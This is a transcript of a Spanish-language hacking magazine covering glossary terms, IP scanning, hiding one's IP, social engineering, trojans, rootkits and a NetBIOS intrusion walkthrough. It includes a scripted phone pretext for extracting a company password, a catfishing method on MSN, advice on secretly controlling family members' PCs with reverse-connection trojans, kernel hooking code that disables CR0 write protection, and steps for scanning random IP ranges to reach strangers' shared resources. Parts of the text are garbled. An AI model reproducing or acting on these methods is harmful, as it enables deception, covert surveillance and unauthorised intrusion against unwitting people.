Seguridad y Hacking

download Seguridad y Hacking

of 62

Transcript of Seguridad y Hacking

La intencin de la presente publicacin no es fomentar la piratera informtica ni la delincuencia en la red. No nos hacemos responsables de la utilidad que se le den al conocimiento aqu adquirido. El uso de los mismos queda bajo exclusiva responsabilidad de quien los utilice. Nuestro objetivo con esta revista es terminar con la basura de la red (lammers y otras esencias) con el nico mtodo que conocemos, la EDUCACION y con una nica bandera que ser siempre nuestra firma. SOLO EL CONOCIMIENTO TE HACE LIBRE

Estos conceptos son simplemente para recordar y facilitar la lectura de la revista, siendo ms cmoda su lectura como su comprensin. Hacker: Hacker es el concepto utilizado para referirse a un experto en varias o alguna rama tcnica relacionada con la informtica: programacin, redes de computadoras, sistemas operativos, hardware de red/voz, etc. Se suele llamar hackeo y hackear a las obras propias de un hacker. Cracker: Un cracker es algo parecido al hacker. El cracker es alguien capaz de violar la seguridad informtica de un sistema, pero a diferencia del hacker, este lo hace con la intencin de hacer dao, o como beneficio personal. Noob: este termino es aplicado a un novato que postea incorrectamente e, fuera de lugar, incumple las normas y/o falta al respeto a otros usuarios. Es rechazado por los dems usuarios, recibir ignorancia y malas contestaciones a sus posts y seguramente ser banneado por el administrador. Suele ser tambin un spammer y/o flooder Newbie: o tambin novato. Es un usuario recin llegado al

foro. Postea correctamente y se integra sin problemas en el ambiente del foro, por lo que pasado cierto tiempo ser un usuario normal del foro Flood: significa colocar muchos mensajes de seguido en un foro. Casi siempre es referido a colocarlos uno tras otro, pero tambin se puede considerar flood cuando 2 o ms usuarios colocan mensajes cortos para hablar entre ellos, como si fuese una conversacin en tiempo real. Una persona que hace flood se la denomina flooder. Un flooder suele ser tachado de querer conseguir aumentar a toda costa su marcador de mensajes puestos en el foro Lamer: Un lamer es alguien inmaduro, que se las da de hacker, cuando en realidad, lo nico que hace es seguir los pasos de lo que dicen los manuales, sin molestarse en aprender el porque de las cosas, y despus, va fardando de que lo ha conseguido, y acreditndose meritos que no son suyos. En muchas ocasiones plagiando manuales y diciendo que han sido creados por el. Troll: se trata de un mensaje en contra de la temtica del foro, es de una tonalidad hostil y provocativa, y suele provocar una grave e intil discusin. Tiene como fin causar un mal ambiente y/o interrumpir un tema. Puede ser el principio de un tema o aparecer en medio de un hilo ya iniciado. Tambin se denomina troll a la persona que postea un mensaje de este tipo. Estos son los trminos para nombrar los Hackers y No Hackers segn su categora. Ahora un poco de vocablo hacker: ADMINISTRADOR, sysop, root: Es la persona que se encarga del sistema, la que tiene el poder absoluto sobre la maquina, a estos se les suele denominar r00t. AGUJERO, bug, hole: Es un defecto en el software o hardware que como su nombre indica deja agujeros para que los crackers en ocasiones los utilicen a su favor. AIX: Sistema operativo de IBM BUGS y EXPLOITS: Los bugs son fallos en el software o en el hardware, los cuales los hackers como crackers los utilizan para penetrar un sistema. Un exploit es un programa que aprovecha el agujero dejado por el bug. Ver AGUJERO. BOMBA LOGICA: Cdigo que ejecuta una particular manera de ataque cuando una determinada condicin se produce. Por

ejemplo una bomba lgica puede formatear el disco duro un da determinado, pero a diferencia de un virus.. La bomba lgica no se replica. BACKDOOR: Puerta trasera. Mecanismo que tiene o que se debe crear en un software para acceder de manera indebida. Este es aprovechado muchas veces por los crackers para vulnerar un sistema. BOXING: Uso de aparatos electrnicos o elctricos (Boxes) para practicar el phreacking, no hace recordar que Hacking & phreacking no son lo mismo... En el phreacking hay blue box, red box, etc. BOUNCER: Tcnica que consiste en usar una maquina de puente y que consigue que tel-neteando al puerto xxxx de la maquina "bouncerada" te redirecciona la salida a un puerto determinado de otra maquina. Esta tcnica es muy usada en el irc redireccionando a los puertos destinados a los servidores de irc por anonimicidad y otros temas que no vienen al caso. CABALLOS DE TROYA: Programa que se queda residente en un sistema y que ha sido desarrollado para obtener algn tipo de informacin. Por ejemplo seria un caballo de Troya un programa que al ejecutarlo enva el fichero de /etc/passwd a una determinada IP (Casualmente la nuestra). COPS: Programa de seguridad. CERT (Computer Emergency Response Team): Es una gente que se dedica de trabajar en seguridad pero que en su esfuerzo por informar de bugs nuevos, en si estas personas nos ayudan ms a nosotros que a ellos. CLOACKER: Programa que borra los logs (huellas) en un sistema. Tambin llamados zappers. CRACKER: Esta palabra tiene dos acepciones, por un lado se denomina CRACKER a un HACKER que entra a un sistema con fines malvados aunque normalmente la palabra CRACKER se usa para denominara a la gente que desprotege programas, los modifica para obtener determinados privilegios, etc. CRACKEADOR DE PASSWORDS: Programa utilizado para sacar los password encriptadas de los archivos de passwords. DAEMON: Proceso en background en los sistemas Unix, es decir un proceso que esta ejecutndose en segundo plano.

EXPLOIT: Mtodo concreto de usar un bug para entrar en un sistema. FUERZA BRUTA: Es el procedimiento que usan tanto los crackeadores de password de UNIX como los de NT (o por lo menos los conocemos) que se basan en aprovechar diccionarios para comparar con los passwords del sistema para obtenerlos. FAKE MAIL: Enviar correo falseando el remitente. Este mtodo es muy til en ingeniera social. GRAN HERMANO: Cuando la gente se refiere al Gran Hermano, se refiere a todo organismo legal de lucha contra el mundo underground. GUSANO: Termino famoso a partir de Robert Morris, Jr.Gusanos son programas que se reproducen ellos mismos copindose una y otra vez de sistema a sistema y que usa recursos de los sistemas atacados. INGENIERIA SOCIAL: Obtencin de informacin por medios ajenos a la informtica. IRIX: Sistema operativo. ISP (Internet Services Provider): Proveedor de servicios internet. KEY: Llave. Se puede traducir por clave de acceso a un software o sistema. KERBEROS: Sistema de seguridad en el que los login y los passwords van encriptadas. KEVIN MITNICK: Es el hacker por excelencia! Sus hazaas pueden encontrar en mil sitios en la red. Aunque algunos cibernautas dicen no ser cierta algunas de esas hazaas. LAMER: Un lamer es una persona que no tiene ninguna inquietud por todos estos temas de la seguridad. Estas lo nico que quiere es tener un login y un password para entrar a un sistema y formatear el disco duro, o para decirle a un amigo que es un Hacker". LINUX: Sistema operativo de la familia UNIX, de bajos recursos. Este sistema operativo es ideal para practicar Hacking. LOGIN: Usuario & contrasea con los cuales puedes obtener acceso al sistema.

MAQUINA: Habitualmente se utiliza para nombrar el Ordenador o el PC. MAIL BOMBER: Es una tcnica que consiste en el envo masivo de mails a una direccin (para lo que hay programas destinados al efecto) con la consiguiente problemtica asociada para la victima. Solo aconsejamos su uso en situaciones crticas. NUKEAR: Consiste en joder o molestar a gente debido a bugs del sistema operativo o de los protocolos. PASSWORD: Contrasea asociada a un login. Tambin se llama asi al famoso fichero de UNIX /etc/passwd que contiene los passwords del sistema. PIRATA: Persona dedicada a la copia y distribucin de software ilegal, tanto software comercial crackeado, como shareware registrado, etc. PGP: (Pretty Good Privacy.) Necesario cuando se necesita enviar mails "calentitos". Es un programa de encriptacin de llave pblica. PORT SCANNER: Programa que te indica que puertos de una maquina est abierto. ROUTER: Maquina de la red que se encarga de encauzar el flujo de paquetes. SNIFFER: Es un programa que monitoriza los paquetes de datos que circulan por una red. Mas claramente, todo lo que circula por la red va en 'paquetes de datos' que el sniffer chequea en busca de informacin referente unas cadenas prefijadas por el que ha instalado el programa. SHELL: Este concepto puede dar lugar a confusin ya que una Shell en un sistema Unix es un programa que interacta entre el kernel y el usuario mientras que en nuestros ambientes significa el conjunto de login y password.... Es decir que si alguien dice que cambia shells ya sabis a lo que se refiere no? TCP/IP: Arquitectura de red con un conjunto de protocolos. Es la que se suele usar en Internet.. Para ms info sobre el tema cualquier libro de TCP IP es valido.. TRACEAR: Seguir la pista a travs de la red a una informacin o de una persona.

UDP: Protocolo de comunicacin que a diferencia del TCP no es orientado a conexin. UNIX: Familia de sistemas operativos que engloba a SunOS, Solaris, irix, etc VMS: Sistema operativo. VIRUS: Es un programa que se reproduce a si mismo y que muy posiblemente ataca a otros programas. Crea copias de si mismo y suele daar o joder datos, cambiarlos o disminuir la capacidad de tu sistema disminuyendo la memoria til o el espacio libre.

En el mundo del Hacking mis queridos amigos es muy importante dominar nuestro sistema operativo al 100%, no podemos hackear algo que no conocemos, al igual que no podremos defendernos. Que es un Sistema Operativo? Un sistema operativo es un software de sistema, es decir, un conjunto de programas de computadora destinado a

permitir Comienza gestiona basicos,

una administracion eficaz de sus recursos. a trabajar cuando se enciende el computador, y el hardware de la maquina desde los niveles mas permitiendo tambien la interaccion con el usuario.

Qu es Windows? Windows es una familia de sistemas operativos desarrollados y comercializados por Microsoft. Existen versiones para hogares, empresas, servidores y dispositivos moviles, como computadores de bolsillo y telefonos inteligentes. Ejemplo de un escritorio de Windows:

Linux (tambien conocido como GNU/Linux) es un sistema operativo tipo Unix que se distribuye bajo la Licencia Publica General de GNU (GNU GPL), es decir que es software libre. Su nombre proviene del Nucleo de Linux. Ejemplo de escritorio de Linux:

Registro de Windows El registro del sistema, o registro de Windows, es una base de datos que almacena las configuraciones y opciones del sistema operativo Microsoft Windows Para acceder a el Registro desde Nuestro ordenador debemos de hacer lo siguiente: (Inicio --> Ejecutar --> Regedit) Podemos ver que nuestro Registro se encuentra MI PC como la cabeza. luego debajo vemos 6 subarboles, y estos 6 subarboles se dividen en claves y las claves se dividen en sub claves, aqui en los foros de hacking se habla con el termino de "ramas" . un ejemplo de como actua el registro de Windows es el siguiente: vamos a la rama HKLMachine\Software\Microsoft\Windows\CurrentVersion\Run en esta rama estan las cosas que se inician con windows para que me entiendan, es como cuando uno prende su ordenador

y inmediatamente se les abre el antivirus, ustedes lo abrieron? no, se inicia con windows, esto es bastante util. y bueno muchas cosas mas del registro nos pueden ser Utiles. Mas sobre el registro Aqui Introduccion al Registro 3.4 Firewall de Windows El Firewall de windows nos ayuda con la proteccion de nuestro sistema operativo, su funcion en nuestro ordenado es supervisar la informacion que pasa entre nuestros ordenadores y internet. nos puede ayudar al momento de que alguien quiera entrar a nuestro ordenador, y en algunos casos bloquea programas sospechosos o que posiblemente tengan un uso que nos pueda perjudicar.

Qu es una IP? Las direcciones IP (IP es un acrnimo para Internet Protocol) son un nmero nico e irrepetible con el cual se identifica una computadora conectada a una red que corre el protocolo IP. Una direccin IP (o simplemente IP como a veces se les refiere) es un conjunto de cuatro nmeros del 0 al 255 separados por puntos. En realidad una direccin IP es una forma ms sencilla de comprender nmeros muy grandes, la direccin 200.36.127.40 es una forma ms corta de escribir el numero 3357835048. Esto se logra traduciendo el nmero en cuatro tripletes. Todo lo que se puede hacer con una IP Con una IP podemos hacer muchas cosas los Cyber policas encuentran pedfilos o Cyber criminales por medio de la IP. a. Geolocalizar una IP Para poder saber todo esto debemos entrar a esta Pg. http://www.ip-adress.com/

Cuando entremos nos va a salir los datos de nuestra IP y un mapa con nuestra localidad. Una vez que estamos en la pgina hacemos clic en donde dice lo siguiente: For IP to Location, IP Tracing, Broadband Speedtest and more tools click here y proseguimos a colocar la IP que queremos Localizar:

b. Escanear IP Con esto podemos saber que Sistema Operativo usa y que puertos tiene abiertos. Esto nos puede ayudar mucho mas adeltante, asi que pongan mucha atencion. Para esto necesitamos ocupar nuestro querido amigo Nmap. Una vez que lo descomprimimos lo debemos de colocar en esta direccion --> c:\nmap Luego en nuestro cmd debemos de colocar:

De esta manera nuestro cmd se ubica donde se encuentra el Nmap. Luego colocamos esto en nuestro cmd: nmap -A IP Sin las comillas.

y de esta manera podremos saber que puertos tiene abiertos.

Recuerda que si sabes explotar puertos, puedes tener tu el control del pc.TCP/IP

Juntos los protocolos TCP e IP conforman un protocolo o mas bien un conjunto de protocolos estandares para la comunicacion entre pcs, cada uno tiene una funcion diferente, el TCP se encarga de el flujo de datos, y el IP se encarga del direccionamiento de dichos datos o paquetes. Recomiendo leer algun manual sobre TCP/IP, no solo porque el tema es extenso, sino porque tambien es bastante complejo.Cmo ocultar una IP?

Esto es algo muy necesario, ya que mas adelante cuando hagamos ataques en muchas ocaciones nos sera util ocultar nuestra IP, para que no nos descubran.

Forma facil de ocultar la ip Con estas herramientas podemos ocultar nuestro IP: -TOR (Vidalia) -Mozilla FirefoxYa una vez descargada la instalamos y nos quedara algo como esto:

Si todo va bien hasta aqui ahora descargamos este plugin para firefox... (https://addons.mozilla.org/esES/firefox/addon/2275) Lo instalamos y despues reiniciamos firefox, nos debera salir esto en la esquina inferior derecha del navegador...

Solo damos un click izquierdo con nuestro Mouse para activarlo y ya debemos de tener nuestra ip oculta...

y ahora, para comprobar...nos dirigimos a www.cualesmiip.com Y si queremos renovar nuestra identidad solo damos un click en nueva identidad... Bueno eso es todo, la unica desventaja de trabajar con proxys es que nuestra navegacion se vuelve mas lenta asi como las descargas debido a que se crea una red virtual entre nosotros y la red

Si tienes conexin a Internet, recomiendo que veas este videotutorial explicativo: (http://www.youtube.com/watch?v=muh9u_F5oeg&feature=player_ embedded) Esta muy completo.

Ingenieria Social - "Hackeando al humano tras la pantalla" Esto es una introduccin al arte de la Ingenieria Social, no esperes ningun metodo revolucionario o magico. Con esto aprenderas las normas basicas sobre este tema y podras formular tus propios metodos. Ingenieria Social? La ingenieria social se usa desde hace mucho antes que todo esto del hacking, esto comenzo en otra subcultura underground llamada phreaking .En esta area la ingenieria social era utilizada para conocer datos sobre las operadoras de Telefono o para obtener contraseas o numeros internos de las compaias de telefonia de la epoca. En fin la ingenieria social consiste en inducir a una persona a hacer algo que nosotros queremos. Por ejemplo para dar un ejemplo practico para darnos su clave de msn. El "arte" de la manipulacion requiere sobre todo de imaginacion e inmersion en

el papel que hagamos. Cabe destacar que la ingenieria social se puede aplicar en todo tipo de medios, ya sea telefono, mensajeria instantanea (msn por ejemplo), mail, en persona (esto requiere mas experiencia pero tambien es una opcion) y muchos mas. Las posibilidades son casi infinitas. Recuerden esta frase... "La debilidad mas grande de un sistema no esta en las computadoras sino en los humanos que las manejan" Comenzando Para introducirnos en este mundo les ejemplo de una conversacion, en este individuo tratara de convenser a una de que le de la contrasea de acceso mostraremos un dialogo de caso telefonica donde un operadora de una empresa del sistema.

Operadora: Hola si, administracion Miguel y asociados, en que puedo ayudarle? Atacante: Mire soy alejandro rolando del personal del sector de informatica, se me rompio el telefono movil y no he podido ingresar al sistema para verificar el firewall externo y la ventilacion del servidor principal (Siempre usa vocavulario tecnico o incluso inventos que suenen tecnicos, te hacen dar una imagen de profesionalidad y credibilidad. Es muy importante no lo olvides de esa forma de enserio pensaran que eres de esa area.) Operadora: En que podriamos ayudarle? Atacante: Lo mas facil seria que me facilite la nueva contrasea asi yo podria ingresar y seguir con mi trabajo antes de que el supervisor me presente una sacion por no haber estado activo estos ultimos 2 dias. Operadora: No estoy segura, esto tal vez deba hablarlo con el tecnico de turno asi podrian llegar a un acuerdo. (Descuida siempre surgen imprevistos, en estos casos inventa evasivas y trata de siempre hablar con gente "ignorante" en el tema, hablar con alguien que sabe tanto o mas que tu seria lo peor que te puede pasar) Atacante: No, porfavor le avisara al supervidor y esto puede costarme el empleo. Operadora: De acuerdo, dejeme su telefono y le avisare cuando consiga la contrasea para que pueda volver al trabajo (No conviene nunca dejar inf. personal cuando haces ing. soc., en estos casos puedes crearte por ej una direccion de correo para la ocacion, tal como en este caso podria ser [email protected]) Atacante: No creo estar disponible para una llamada, pero podria enviarmelo a mi casilla de mail? Operadora: de acuerdo, deje su mail. Atacante: [email protected]

Operadora: Bueno muchas gracias, en breve tendra su respuesta. Atacante: Exelente, adios que tenga buen dia. Con este ejemplo queda bien claro lo que trataremos. Un punto importante en la ingenieria social y mas si es por telefono, es la naturalidad al hablar. Nunca debemos ponernos nerviosos y debemos anticipar todo lo que nos pueda decir el otro. Como casi todo, debes practicar mucho antes de lanzarte a la practica, una buena ayuda es provando primero con amigos o talvez pequeos locales como almacenes para "entrar en calor" no seria para nada sensato provar de entrada con una empresa. Ademas que si cometes algun error con una empresa y te descubren es muy posible que te rastreen, por eso tambien es muy importante dejar la menor informacion real posible. Otros metodos & consideraciones Otro metodo factible y muy de moda, es la ingenieria social por msn. Basicamente esta consiste en 4 pasos: a. Crear un msn ficticio. b. Conseguir una serie de fotos (de chicos o chicas dependiendo con quien vamos a usar el metodo. Otra cosa, por mas que lo tomo como sobreentendido y es sentido comun, las fotos deben ser de la misma persona no sirve tener 3 fotos de distintas personas) para nuestro avatar o simplemente para pasarle al contacto. c. Preparar el msn para que quede como uno de verdad, agregandole un nombre adecuado, un buen avatar (vease punto 2) y otros detalles o consideraciones personales. d. Agregar el contancto. Luego de esto, solo basta con convenser al otro desde el principio, dandole cierta seguridad de que te conoce aunque no te tiene presente. Como logramos esto?? Bueno por ejemplo cuando lo agregamos nos dice (esto pasa el 99% de las veces) "Quien eres?? quien te ha dado mi msn???". En este caso particular, le damos el nombre que hemos elegido e inventamos una situacion falsa tal como... "soy romina, no recuerdas??? nos conocimos en la disco el sabado pasado, anotaste tu msn en mi brazo" o "soy romina, amiga de sofia, me dijo que eras un chico muy apuesto y que podria charlar contigo sin tener ningun problema". Alagar a nuestro contacto tambien es un elemento poderoso, lo hara ganar confianza y pensar que de verdad esta llevando la situacion. (Siempre es bueno tener algo de informacin sobre el contacto). No existe una guia de Ingenieria Social, ya que esta tecnica la desarrolla uno mismo, ideando sus propios metodos para llevarlos a la practica

La adminitracion Remota es controlar otro PC a distancia, osea poder manipular la PC de otra persona, existen muchos sofwares que nos permiten eso, incluso el mismo windows tiene incorporado la administracion Remota, pero para eso los 2 ordenadores deben de estar de acuerdo, la idea es poder controlar el PC de tu hermana, hermano, primo, tio, amigo, enemigo, papa, mama, perro, [pero sin que ellos sepan]. Para esto, existen nuestros amigos, los troyanos. Troyanos Un troyano te permite controlar la PC de otra persona remotamente. Podras ver lo que este haciedo, controlar todo lo que escriva, robarle, borrarle, cambirle de nombre, y subirle archivos, programas, fotos o lo que quieras... ver la informacion de su sistema, entrar en su registro, en la consola...etc.

Partes de un Troyano Un troyano consta principalmente de 2 partes. Una se llama cliente.exe y otra server.exe (el server lo devereis crear ustedes mismos). cliente.exe Este es el archivo que deberas ejecutar en tu PC & con el cual controlaras a tus victimas. server.exe Es el archivo que debes de enviar y tus avictimas deveran ejecutar. Una vez ejecutado, ya podras controlar remotamente su PC Que tipos de Troyanos existen? Existen dos tipos de Troyanos, los de conexin directa y los de conexin inversa. Los de conexion inversa Se conectan a tu PC sin necesidad de tener que conocer la IP de tu victima. Es decir, una ves tu victima ejecute tu troyano, ya no lo tendra que volver a hacer puesto que este ara que la victima se conecte a tu Pc automticamente. (Estos son los mejores desde nuestro punto de vista). Los de conexion directa Son algo mas complicados de mantener a la victima, puesto que tras enviarle el server, despues deveremos meter su ip para conectarnos a el y poder controlar a nustra victima. Pero claro, el problema esta en que deveremos averiguar la ip de nuestra victima, y que como las ip cambian.. la tendremos q averiguar una y otra y otra vez... Botnet El artfice de la botnet puede controlar todos los ordenadores/servidores infectados de forma remota y normalmente lo hace a travs del IRC. Sus fines normalmente son poco ticos. En la botnet, los bots son igual que las vctimas de los troyanos, a los cuales, podremos controlarles, segn las caractersticas del troyano que hayamos creado o descargado. Podremos usar el keylogger, ver la info del PCetc. Rootkits Los rootkits, el tema es extenso as que daremos definiciones y ejemplos ficticios de su utilizacin para pasar directamente al funcionamiento interno de estas importantes herramientas, las cuales no solo funcionan como troyanos a nivel kernel: su importante uso compromete el sistema de manera irreparable, por ello es de suma importancia conocer su funcionamiento no

solo para lograr defendernos... sino para lograr alterar su composicin bsica y lograr la mutacin adecuada asegurando el acceso al sistema comprometido en distintas ocasiones. Para esto me centrar en los rootkits que tienen como target principal los sistemas Windows. La actividad bsica que realiza un rootkit para su correcto funcionamiento son la desactivacin del registro de sucesos en el sistema para un usuario determinado (Administrator) refiriendose a la auditoria interna, permite el acceso al sistema como administrador utilizando un usuario/contrasea oculto. Desactiva de manera directa la seguridad mediante la aplicacin parches en el kernel, tratandose esta, la accin mas disruptiva y sensible en la manera de operar de todo rootkit. Mediante estas actividades se asegura que el sistema vulnerado podr ser accesado de nuevo por el intruso, sin que este de seales de alerta. Para llevar a cabo estas tareas un rootkit posee un conjunto de herramientas las cuales son capaces de sustituir los archivos binarios por otros troyanizados, esto no es dificil de creer pues un rootkit se ejecuta una vez obtenida la cuenta de Administrador, lo cual permite sobreescribir y manipular los ejecutables del sistema. Ahora bien, para lograr su cometido todo rootkit primero requiere ocultarse al sistema fuente. para ello realiza la captura de funciones a nivel sistema (INT2Eh). Las llamadas indispensables que se capturan para despus troyanizarlas son las siguientes: ZwCreateFile ZwOpenFile ZwQueryDirecto ryFile ZwOpenProcess ZwQuerySystemI nformation

A nivel programacin esto se logra en la gran mayoria de los casos con ansi C incrustando cdigo ASM donde este ltimo es el verdadero malicioso, este es un fragmento de cdigo con el cual se realiza una captura de una llamada a sistema: mov lea int ret eax, 0x0000001A edx, [esp+04] 0x2E 0x2C

donde: EAX --> Es el identificador de la funcion. EDX --> Es un puntero a los parmetros en la stack.

Bsicamente se deposita la direccin base de la IDT en la localizacin especificada en el segundo parmetro indicado por esp, a partir de la base se puede indexar el descriptor de una interrupcin, manipulando su selector y su desplazamiento . Una vez alcanzado este nivel de privilegios, el sistema depende por completo de los descriptores y sus posibles desplazamiento s llevados a cabo por el rootkit mediante el programa especifico destinado para esta funcin. Las APIs de KERNEL32 son un envoltorio entorno a las APIs de NTDLL, mucho ms primitivas. Por lo tanto cada servicio del sistema posee un identificador. 12bit > Identificador del servicio. 2bit > Tabla de servicios a emplear. 0 > Servicios del ncleo (NTDLL). 1 > Servicios del entorno grfico (WIN32K). 2 y 3 > No se emplean. 18bit > Reservados este identificador es utilizado por el rootkit para manipular e interceptar el servicio objetivo, para ello el cdigo de una funcin comienza cargando dicho identificador del servicio en EAX, sabiendo esto de antemano la lnea bsica para lograr esto sera: MOV EAX,id ; A5h XX XX XX XX Ahora bien, cual es el verdadero proposito de todos estos conceptos? pongamos un ejemplo prctico, supongamos que deseamos ejecutar Vanquish Rootkit en un sistema Windows Server Enterprise 2003 R2, recin parcheado por el administrador de sistemas y puesto a disposicin de un IPS, que pasara al tratar de instalar nuestro rootkit? quiz la instalacin procederia sin ningn problema pues el IPS entra en accin una vez que el los ejecutables que forman el rootkit comienzan a aplicar el payload, una vez instalado sera intil pues Vanquish realiza la captura de las funciones del sistema alterando la tabla de servicios, para evitar esto Microsoft decidio denegar el acceso a la escritura a partir de Windows XP el cual es el sistema mas atacado pues es un blanco mas comn entre intrusos. La versin Server de windows 2003 es una versin mucho mas robusta y modular de este SO que permite la ejecucin de llamadas a sistema permitiendo sobreescribir el id de urgencia, pues son equipos que regurlarmente son conectados a otros equipos de storage. Los cuales requieren altos privilegios cuando realizan replicaciones relacionadas no solo con el storage sino tambin con el SO. Debuggeando un poco un agente de storage podemos percatarnos

que en algunos casos, estos desactivan la proteccin de escritura en el registro de control CR0 para realizar funciones de mantenimiento, esto "supuestamente" es informacin confidencial de los fabricantes, pero al instalar dichos agentes es bastante predecible que lo hacen pues tratandose de storage de alto rendimiento Hitachi, EMC y SUN apuestan a la constancia en linea de sus equipos de storage que a la seguridad aplicativa/abstractiva... debuggeando un poco un agente de storage del cual guardar su confidencialid ad, encontramos lo siguiente: #define WPOFF() \ _asm mov eax, cr0 \ _asm and eax, NOT 10000H \ _asm mov cr0, eax #define WPON() \ _asm mov eax, cr0 \ _asm or eax, 10000H \ _asm mov cr0, eax *Obtenido con CDB. Esto es, la desactivacin de la proteccin y escritura del registro de control CR0, basta crear las macros para su ejecucin y despues modificar a nuestro gusto la tabla de servicios de la siguiente manera: DbgPrint( ( "GKit: HookSystemServ ice() Hooking SST %x Index %03x Old %08x\n", ulSST, ulIndex, ( ULONG) pfnOldHandler)) ; __try { WPOFF() ; pfnOldHandler = InterlockedExc hangePointer( pfnHandler, pfnNewHandler) ; WPON() ; DbgPrint( ( "GKit: HookSystemServ ice() Done\n")); //Si funciona } __except( EXCEPTION_EXEC UTE_HANDLER) { pfnOldHandler = pfnHandler ; DbgPrint( ( "GKit: HookSystemServ ice() Hook failed can't write\n")) ; //No funciona } No tratar de explicar el cdigo anterior pues es muy predecible y esta no es el objetivo de este paper, empero,

basta observar la funcin hook con la cual se parchea la tabla. Esto es lo que hara un rootkit luego de desactivar los registros de control, los cuales, en muchos sistemas se encuentran desactivados por software propietario de storage los cuales en algunas ocasiones hay que conocerlos para simplificar nuestro trabajo. De esta manera un rootkit toma control del sistema, es importante conocer estos conceptos bsicos para dejar de ser simples usuarios que al obtener un error de ejecucin opta por cambiar de aplicacin, en lugar de comprender el porque de ese error y cual es su posible solucin. Esto nos da un doble valor agregado... es mas probable que un rootkit se ejecute correctamente en un servidor de alto rendimiento que un equipo windows XP con todos los hotfix aplicados al da, debido a la gran cantidad de aplicaciones tipo socket controladores que poseen. Y, si tomamos en cuenta que en la actualidad los "agentes" (un simple socket) trabajan por UDP entre servidores que alcanzan la red externa de las empresas (discos por iscsi, servidores front-end con bases en oracle atacheadas a storage comunicado por agentes etc etc, pues se trata de una necesidad BASICA), se puede observar que el campo de posibles sistemas vulnerables a este tipo de accionar es muy amplio. Solo basta saber en donde buscar y como hacerlo. Por ejemplo: Operation Manager... software que sirve para obtener informacin acerca de la topologa e infrastructura a nivel aplicativo y de storage en toda un red... trabaja por los puertos 8752 y 8753 de manera predeterminada para los sistemas hitachis UPS y estos a su vez poseen una consola basada en Windows 2000... el campo es muy amplio, obvio Vanquish es un rootkit antiguo, conseguir rootkits actuales no es imposible. Hemos sido muy breve pues es muy dificil tratar de explicar todas y cada una de las acciones que toma en cuenta un rootkit para asegurar el sistema a un intruso, pero creo que los aspectos bsicos de funcionameinet o fueron abordados de manera concreta.

Ahora comenzaremos recien con el Hacking, el conocimiento previo (Debemos dominar al 100% la informacion adquirida, & tambien saber aplicarla), ahora hablaremos de intrusin o ataque, esperando que obtengan todo el conocimiento posible. Recuerda que siempre debemos tener la Etica por sobre todas las cosas. Intrusin mediante el protocolo NETBIOS con Windows XP Herramientas requeridas: IpScan

Un sucio Rango de IPs Sabiendo que es una IP, con esto nos viene una pregunta, qu por la mam de Tarzn y la virgen Mara juntos es un Rango de IPs? Un rango de IPs es todo lo que abarca un Comienzo de IP y un Fin de IP, Qu decimos? Se preguntarn, es fcil, les doy un ejemplo: Comienzo de IP 129.39.59.0 Fin de IP 129.39.59.255 Por si no esta claro daremos otro ejemplo: El comienzo es 129.39.59.0, despus de sa IP sigue 129.39.59.1, despus 129.39.59.2 y as sucesivamente hasta llegar a 129.39.59.255. Eso es un Rango de IPs. Configurando Ya dejmonos la teora y comencemos a moverle a la computadora (cuidado que las PC son del diablo y nunca sabes cuando te va a aparecer un BSOD). Comencemos configurando nuestra PC para que tenga habilitado el protocolo NETBIOS, lleven a cabo lo siguiente: Clic en Inicio. Clic en Panel de control. Clic en Conexiones de red. Doble clic sobre el icono de conexin (puede que tengan varias conexiones, as que asegrense de que sea la conexin que usan para acceder a Internet). Clic en Propiedades. En la ventana que apareci, den doble clic sobre Protocolo Internet (TCP/IP). Clic en Opciones avanzadas. Clic en la pestaa WINS. Clic sobre Habilitar NetBios sobre TCP/IP. Clic en Aceptar (lo mismo para las dems ventanas). Habilitando el protocolo NetBios Ya que tenemos habilitado el protocolo NETBIOS en nuestra PC, procedemos a abrir la aplicacin llamada IPScan para configurar algunos parmetros. Abrimos las opciones (Options-->Options) y damos clic en Only alive y despus clic en el botn OK & Save. Ahora introducimos nuestro Rango de IPs.

Recuerden comienzo de IP y fin de IP, el comienzo de IP lo vamos a colocar en el primer cuadro donde dice IP range y el Fin de IP en el cuadro donde dice To. Noten que los cuadros estn encerrados por un crculo en la siguiente figura (tambin se muestra la configuracin de la aplicacin):

Haciendo cochinadas y un poco de Spam. Ahora, lo que falta por hacer es dar clic en el botn Start y esperar a que termine de buscar todas nuestras IPs, (cabe mencionar que si no existe ninguna IP viva o activa en el Rango de IPs que dieron, no les va a aparecer ninguna mquina conectada, as que es probable que tengan que definir otro Rango de IPs.) Ahora, suponiendo que ya tienen un rango de IPS con maquinas conectadas les va a aparecer un mensaje indicado el rango de ips, la cantidad de ips que se buscaron y las maquinas conectadas. Al lado derecho encontrarn todas las mquinas conectadas (las van a identificar inmediatamente pues tienen un crculo azul a su derecha). No est de ms especificar que tap con una asquerosa pero prudente raya negra todas las IPs (por

cuestiones de seguridad), as que no esperen ver esa misma raya negra en su mquina. Ver siguiente figura:

Mquinas conectadas encontradas y cuadro de informacin. Ahora viene lo bueno, Damos clic sobre la columna llamada IP (se encuentra encerrada por un crculo) y damos clic derecho sobre una IP (la que ms mal les guste) y elegimos Show-->Show NetBIOS info. Ver siguiente imagen:

Clic derecho sobre columna IP y sobre una IP A partir de aqu les puede aparecer dos mensajes, uno es un cuadro mostrando informacin sobre la mquina. Ver siguiente imagen:

Informacin sobre PC

Y el otro mensaje es uno indicndonos que la mquina no tiene el protocolo NETBIOS habilitado. Ver siguiente imagen:

La mquina no tiene el protocolo NETBIOS habilitado. Suponiendo que les aparecio el mensaje indicando la informacin NETBIOS de la mquina, debern abrir la consola de MS-DOS (Inicio-->Clic en Ejecutar-->Escriben CMD), estando en la consola de MS-DOS escriben lo siguiente: NBTSTAT A IP_Maquina donde IP_Maquina es la IP de la mquina que les mostr la informacin. En la siguiente imagen se muestra una IP falsa, pero tommosla como ejemplo: NBTSTAT A 111.111.111.22. Les va a aparecer el nombre de la mquina con algunos nmeros raros a la derecha (lo que se encuentra encerrado por un crculo). Ver imagen:

Usar NBTSTAT A (numeros raros de la derecha). Bueno, ya dejmonos de "cochinadas" y enfoqumonos a una mquina que s tenga

recursos compartidos... Repitan los pasos anteriores (busquen una maquina) hasta que encuentren una mquina que les muestre lo que en la siguiente imagen se encierra (ejemplo con otra IP):

